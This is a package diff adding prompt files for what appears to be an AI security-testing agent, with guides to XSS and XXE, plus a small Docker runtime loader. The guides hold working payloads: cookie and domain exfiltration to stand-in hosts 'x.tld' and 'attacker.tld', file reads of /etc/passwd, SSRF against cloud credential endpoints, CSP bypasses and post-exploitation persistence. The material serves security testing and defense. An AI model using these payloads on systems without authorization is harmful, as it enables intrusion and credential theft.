strix-agent 0.4.0__py3-none-any.whl

strix/prompts/vulnerabilities/xss.jinja

@@ -0,0 +1,169 @@
+<xss_vulnerability_guide>
+<title>CROSS-SITE SCRIPTING (XSS)</title>
+
+<critical>XSS persists because context, parser, and framework edges are complex. Treat every user-influenced string as untrusted until it is strictly encoded for the exact sink and guarded by runtime policy (CSP/Trusted Types).</critical>
+
+<scope>
+- Reflected, stored, and DOM-based XSS across web/mobile/desktop shells
+- Multi-context injections: HTML, attribute, URL, JS, CSS, SVG/MathML, Markdown, PDF
+- Framework-specific sinks (React/Vue/Angular/Svelte), template engines, and SSR/ISR
+- CSP/Trusted Types interactions, bypasses, and gadget-based execution
+</scope>
+
+<methodology>
+1. Identify sources (URL/query/hash/referrer, postMessage, storage, WebSocket, service worker messages, server JSON) and trace to sinks.
+2. Classify sink context: HTML node, attribute, URL, script block, event handler, JavaScript eval-like, CSS, SVG foreignObject.
+3. Determine current defenses: output encoding, sanitizer, CSP, Trusted Types, DOMPurify config, framework auto-escaping.
+4. Craft minimal payloads per context; iterate with encoding/whitespace/casing/DOM mutation variants; confirm with observable side effects beyond alert.
+</methodology>
+
+<injection_points>
+- Server render: templates (Jinja/EJS/Handlebars), SSR frameworks, email/PDF renderers
+- Client render: innerHTML/outerHTML/insertAdjacentHTML, template literals, dangerouslySetInnerHTML, v-html, $sce.trustAsHtml, Svelte {@html}
+- URL/DOM: location.hash/search, document.referrer, base href, data-* attributes
+- Events/handlers: onerror/onload/onfocus/onclick and JS: URL handlers
+- Cross-context: postMessage payloads, WebSocket messages, local/sessionStorage, IndexedDB
+- File/metadata: image/SVG/XML names and EXIF, office documents processed server/client
+</injection_points>
+
+<context_rules>
+- HTML text: encode < > & " '
+- Attribute value: encode " ' < > & and ensure attribute quoted; avoid unquoted attributes
+- URL/JS URL: encode and validate scheme (allowlist https/mailto/tel); disallow javascript/data
+- JS string: escape quotes, backslashes, newlines; prefer JSON.stringify
+- CSS: avoid injecting into style; sanitize property names/values; beware url() and expression()
+- SVG/MathML: treat as active content; many tags execute via onload or animation events
+</context_rules>
+
+<advanced_detection>
+<differential_responses>
+- Compare responses with/without payload; normalize by length/ETag/digest; observe DOM diffs with MutationObserver
+- Time-based userland probes: setTimeout gating to detect execution without visible UI
+</differential_responses>
+
+<multi_channel>
+- Repeat tests across REST, GraphQL, WebSocket, SSE, Service Workers, and background sync; protections diverge per channel
+</multi_channel>
+</advanced_detection>
+
+<advanced_techniques>
+<dom_xss>
+- Sources: location.* (hash/search), document.referrer, postMessage, storage, service worker messages
+- Sinks: innerHTML/outerHTML/insertAdjacentHTML, document.write, setAttribute, setTimeout/setInterval with strings, eval/Function, new Worker with blob URLs
+- Example vulnerable pattern:
+{% raw %}
+const q = new URLSearchParams(location.search).get('q');
+results.innerHTML = `<li>${q}</li>`;
+{% endraw %}
+Exploit: {% raw %}?q=<img src=x onerror=fetch('//x.tld/'+document.domain)>{% endraw %}
+</dom_xss>
+
+<mutation_xss>
+- Leverage parser repairs to morph safe-looking markup into executable code (e.g., noscript, malformed tags)
+- Payloads:
+{% raw %}<noscript><p title="</noscript><img src=x onerror=alert(1)>
+<form><button formaction=javascript:alert(1)>{% endraw %}
+</mutation_xss>
+
+<template_injection>
+- Server or client templates evaluating expressions (AngularJS legacy, Handlebars helpers, lodash templates)
+- Example (AngularJS legacy): {% raw %}{{constructor.constructor('fetch(`//x.tld?c=`+document.cookie)')()}}{% endraw %}
+</template_injection>
+
+<csp_bypass>
+- Weak policies: missing nonces/hashes, wildcards, data: blob: allowed, inline events allowed
+- Script gadgets: JSONP endpoints, libraries exposing function constructors, import maps or modulepreload lax policies
+- Base tag injection to retarget relative script URLs; dynamic module import with allowed origins
+- Trusted Types gaps: missing policy on custom sinks; third-party introducing createPolicy
+</csp_bypass>
+
+<trusted_types>
+- If Trusted Types enforced, look for custom policies returning unsanitized strings; abuse policy whitelists
+- Identify sinks not covered by Trusted Types (e.g., CSS, URL handlers) and pivot via gadgets
+</trusted_types>
+
+<polyglot_minimal>
+- Keep a compact set tuned per context:
+HTML node: {% raw %}<svg onload=alert(1)>{% endraw %}
+Attr quoted: {% raw %}" autofocus onfocus=alert(1) x="{% endraw %}
+Attr unquoted: {% raw %}onmouseover=alert(1){% endraw %}
+JS string: {% raw %}"-alert(1)-"{% endraw %}
+URL: {% raw %}javascript:alert(1){% endraw %}
+</polyglot_minimal>
+</advanced_techniques>
+
+<frameworks>
+<react>
+- Primary sink: dangerouslySetInnerHTML; secondary: setting event handlers or URLs from untrusted input
+- Bypass patterns: unsanitized HTML through libraries; custom renderers using innerHTML under the hood
+- Defense: avoid dangerouslySetInnerHTML; sanitize with strict DOMPurify profile; treat href/src as data, not HTML
+</react>
+
+<vue>
+- Sink: v-html and dynamic attribute bindings; server-side rendering hydration mismatches
+- Defense: avoid v-html with untrusted input; sanitize strictly; ensure hydration does not re-interpret content
+</vue>
+
+<angular>
+- Legacy expression injection (pre-1.6); $sce trust APIs misused to whitelist attacker content
+- Defense: never trustAsHtml for untrusted input; use bypassSecurityTrust only for constants
+</angular>
+
+<svelte>
+- Sink: {@html} and dynamic attributes
+- Defense: never pass untrusted HTML; sanitize or use text nodes
+</svelte>
+
+<markdown_richtext>
+- Markdown renderers often allow HTML passthrough; plugins may re-enable raw HTML
+- Sanitize post-render; forbid inline HTML or restrict to safe whitelist; remove dangerous URI schemes
+</markdown_richtext>
+
+<special_contexts>
+<emails>
+- Most clients strip scripts but allow CSS/remote content; use CSS/URL tricks only if relevant; avoid assuming JS execution
+</emails>
+
+<pdf_and_docs>
+- PDF engines may execute JS in annotations or links; test javascript: in links and submit actions
+</pdf_and_docs>
+
+<file_uploads>
+- SVG/HTML uploads served with text/html or image/svg+xml can execute inline; verify content-type and Content-Disposition: attachment
+- Mixed MIME and sniffing bypasses; ensure X-Content-Type-Options: nosniff
+</file_uploads>
+</special_contexts>
+
+<post_exploitation>
+- Session/token exfiltration: prefer fetch/XHR over image beacons for reliability; bind unique IDs to correlate victims
+- Real-time control: WebSocket C2 that evaluates only a strict command set; avoid eval when demonstrating
+- Persistence: service worker registration where allowed; localStorage/script gadget re-injection in single-page apps
+- Impact: role hijack, CSRF chaining, internal port scan via fetch, content scraping, credential phishing overlays
+</post_exploitation>
+
+<validation>
+1. Provide minimal payload and context (sink type) with before/after DOM or network evidence.
+2. Demonstrate cross-browser execution where relevant or explain parser-specific behavior.
+3. Show bypass of stated defenses (sanitizer settings, CSP/Trusted Types) with proof.
+4. Quantify impact beyond alert: data accessed, action performed, persistence achieved.
+</validation>
+
+<false_positives>
+- Reflected content safely encoded in the exact context
+- CSP with nonces/hashes and no inline/event handlers; Trusted Types enforced on sinks; DOMPurify in strict mode with URI allowlists
+- Scriptable contexts disabled (no HTML pass-through, safe URL schemes enforced)
+</false_positives>
+
+<pro_tips>
+1. Start with context classification, not payload brute force.
+2. Use DOM instrumentation to log sink usage; it reveals unexpected flows.
+3. Keep a small, curated payload set per context and iterate with encodings.
+4. Validate defenses by configuration inspection and negative tests.
+5. Prefer impact-driven PoCs (exfiltration, CSRF chain) over alert boxes.
+6. Treat SVG/MathML as first-class active content; test separately.
+7. Re-run tests under different transports and render paths (SSR vs CSR vs hydration).
+8. Test CSP/Trusted Types as features: attempt to violate policy and record the violation reports.
+</pro_tips>
+
+<remember>Context + sink decide execution. Encode for the exact context, verify at runtime with CSP/Trusted Types, and validate every alternative render path. Small payloads with strong evidence beat payload catalogs.</remember>
+</xss_vulnerability_guide>

strix/prompts/vulnerabilities/xxe.jinja

@@ -0,0 +1,184 @@
+<xxe_vulnerability_guide>
+<title>XML EXTERNAL ENTITY (XXE)</title>
+
+<critical>XXE is a parser-level failure that enables local file reads, SSRF to internal control planes, denial-of-service via entity expansion, and in some stacks, code execution through XInclude/XSLT or language-specific wrappers. Treat every XML input as untrusted until the parser is proven hardened.</critical>
+
+<scope>
+- File disclosure: read server files and configuration
+- SSRF: reach metadata services, internal admin panels, service ports
+- DoS: entity expansion (billion laughs), external resource amplification
+- Injection surfaces: REST/SOAP/SAML/XML-RPC, file uploads (SVG, Office), PDF generators, build/report pipelines, config importers
+- Transclusion: XInclude and XSLT document() loading external resources
+</scope>
+
+<methodology>
+1. Inventory all XML consumers: endpoints, upload parsers, background jobs, CLI tools, converters, and third-party SDKs.
+2. Start with capability probes: does the parser accept DOCTYPE? resolve external entities? allow network access? support XInclude/XSLT?
+3. Establish a quiet oracle (error shape, length/ETag diffs, OAST callbacks), then escalate to targeted file/SSRF payloads.
+4. Validate per-channel parity: the same parser options must hold across REST, SOAP, SAML, file uploads, and background jobs.
+</methodology>
+
+<discovery_techniques>
+<surface_map>
+- File uploads: SVG/MathML, Office (docx/xlsx/ods/odt), XML-based archives, Android/iOS plist, project config imports
+- Protocols: SOAP/XML-RPC/WebDAV/SAML (ACS endpoints), RSS/Atom feeds, server-side renderers and converters
+- Hidden paths: "xml", "upload", "import", "transform", "xslt", "xsl", "xinclude" parameters; processing-instruction headers
+</surface_map>
+
+<capability_probes>
+- Minimal DOCTYPE: attempt a harmless internal entity to detect acceptance without causing side effects
+- External fetch test: point to an OAST URL to confirm egress; prefer DNS first, then HTTP
+- XInclude probe: add xi:include to see if transclusion is enabled
+- XSLT probe: xml-stylesheet PI or transform endpoints that accept stylesheets
+</capability_probes>
+</discovery_techniques>
+
+<detection_channels>
+<direct>
+- Inline disclosure of entity content in the HTTP response, transformed output, or error pages
+</direct>
+
+<error_based>
+- Coerce parser errors that leak path fragments or file content via interpolated messages
+</error_based>
+
+<oast>
+- Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks
+- Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens)
+</oast>
+
+<timing>
+- Fetch slow or unroutable resources to produce measurable latency differences (connect vs read timeouts)
+</timing>
+</detection_channels>
+
+<core_payloads>
+<local_file>
+<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<r>&xxe;</r>
+
+<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
+<r>&xxe;</r>
+</local_file>
+
+<ssrf>
+<!DOCTYPE x [<!ENTITY xxe SYSTEM "http://127.0.0.1:2375/version">]>
+<r>&xxe;</r>
+
+<!DOCTYPE x [<!ENTITY xxe SYSTEM "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI">]>
+<r>&xxe;</r>
+</ssrf>
+
+<oob_parameter_entity>
+<!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://attacker.tld/evil.dtd"> %dtd;]>
+
+evil.dtd:
+<!ENTITY % f SYSTEM "file:///etc/hostname">
+<!ENTITY % e "<!ENTITY &#x25; exfil SYSTEM 'http://%f;.attacker.tld/'>">
+%e; %exfil;
+</oob_parameter_entity>
+</core_payloads>
+
+<advanced_techniques>
+<parameter_entities>
+- Use parameter entities in the DTD subset to define secondary entities that exfiltrate content; works even when general entities are sanitized in the XML tree
+</parameter_entities>
+
+<xinclude>
+<root xmlns:xi="http://www.w3.org/2001/XInclude">
+  <xi:include parse="text" href="file:///etc/passwd"/>
+</root>
+- Effective where entity resolution is blocked but XInclude remains enabled in the pipeline
+</xinclude>
+
+<xslt_document>
+- XSLT processors can fetch external resources via document():
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/">
+    <xsl:copy-of select="document('file:///etc/passwd')"/>
+  </xsl:template>
+</xsl:stylesheet>
+- Targets: transform endpoints, reporting engines (XSLT/Jasper/FOP), xml-stylesheet PI consumers
+</xslt_document>
+
+<protocol_wrappers>
+- Java: jar:, netdoc:
+- PHP: php://filter, expect:// (when module enabled)
+- Gopher: craft raw requests to Redis/FCGI when client allows non-HTTP schemes
+</protocol_wrappers>
+</advanced_techniques>
+
+<filter_bypasses>
+<encoding_variants>
+- UTF-16/UTF-7 declarations, mixed newlines, CDATA and comments to evade naive filters
+</encoding_variants>
+
+<doctype_variants>
+- PUBLIC vs SYSTEM, mixed case <!DoCtYpE>, internal vs external subsets, multi-DOCTYPE edge handling
+</doctype_variants>
+
+<network_controls>
+- If network blocked but filesystem readable, pivot to local file disclosure; if files blocked but network open, pivot to SSRF/OAST
+</network_controls>
+</filter_bypasses>
+
+<special_contexts>
+<soap>
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+    <d>&xxe;</d>
+  </soap:Body>
+</soap:Envelope>
+</soap>
+
+<saml>
+- Assertions are XML-signed, but upstream XML parsers prior to signature verification may still process entities/XInclude; test ACS endpoints with minimal probes
+</saml>
+
+<svg_and_renderers>
+- Inline SVG and server-side SVG→PNG/PDF renderers process XML; attempt local file reads via entities/XInclude
+</svg_and_renderers>
+
+<office_docs>
+- OOXML (docx/xlsx/pptx) are ZIPs containing XML; insert payloads into document.xml, rels, or drawing XML and repackage
+</office_docs>
+</special_contexts>
+
+<validation>
+1. Provide a minimal payload proving parser capability (DOCTYPE/XInclude/XSLT).
+2. Demonstrate controlled access (file path or internal URL) with reproducible evidence.
+3. Confirm blind channels with OAST and correlate to the triggering request.
+4. Show cross-channel consistency (e.g., same behavior in upload and SOAP paths).
+5. Bound impact: exact files/data reached or internal targets proven.
+</validation>
+
+<false_positives>
+- DOCTYPE accepted but entities not resolved and no transclusion reachable
+- Filters or sandboxes that emit entity strings literally (no IO performed)
+- Mocks/stubs that simulate success without network/file access
+- XML processed only client-side (no server parse)
+</false_positives>
+
+<impact>
+- Disclosure of credentials/keys/configs, code, and environment secrets
+- Access to cloud metadata/token services and internal admin panels
+- Denial of service via entity expansion or slow external resources
+- Code execution via XSLT/expect:// in insecure stacks
+</impact>
+
+<pro_tips>
+1. Prefer OAST first; it is the quietest confirmation in production-like paths.
+2. When content is sanitized, use error-based and length/ETag diffs.
+3. Probe XInclude/XSLT; they often remain enabled after entity resolution is disabled.
+4. Aim SSRF at internal well-known ports (kubelet, Docker, Redis, metadata) before public hosts.
+5. In uploads, repackage OOXML/SVG rather than standalone XML; many apps parse these implicitly.
+6. Keep payloads minimal; avoid noisy billion-laughs unless specifically testing DoS.
+7. Test background processors separately; they often use different parser settings.
+8. Validate parser options in code/config; do not rely on WAFs to block DOCTYPE.
+9. Combine with path traversal and deserialization where XML touches downstream systems.
+10. Document exact parser behavior per stack; defenses must match real libraries and flags.
+</pro_tips>
+
+<remember>XXE is eliminated by hardening parsers: forbid DOCTYPE, disable external entity resolution, and disable network access for XML processors and transformers across every code path.</remember>
+</xxe_vulnerability_guide>

strix/runtime/__init__.py

@@ -0,0 +1,19 @@
+import os
+
+from .runtime import AbstractRuntime
+
+
+def get_runtime() -> AbstractRuntime:
+    runtime_backend = os.getenv("STRIX_RUNTIME_BACKEND", "docker")
+
+    if runtime_backend == "docker":
+        from .docker_runtime import DockerRuntime
+
+        return DockerRuntime()
+
+    raise ValueError(
+        f"Unsupported runtime backend: {runtime_backend}. Only 'docker' is supported for now."
+    )
+
+
+__all__ = ["AbstractRuntime", "get_runtime"]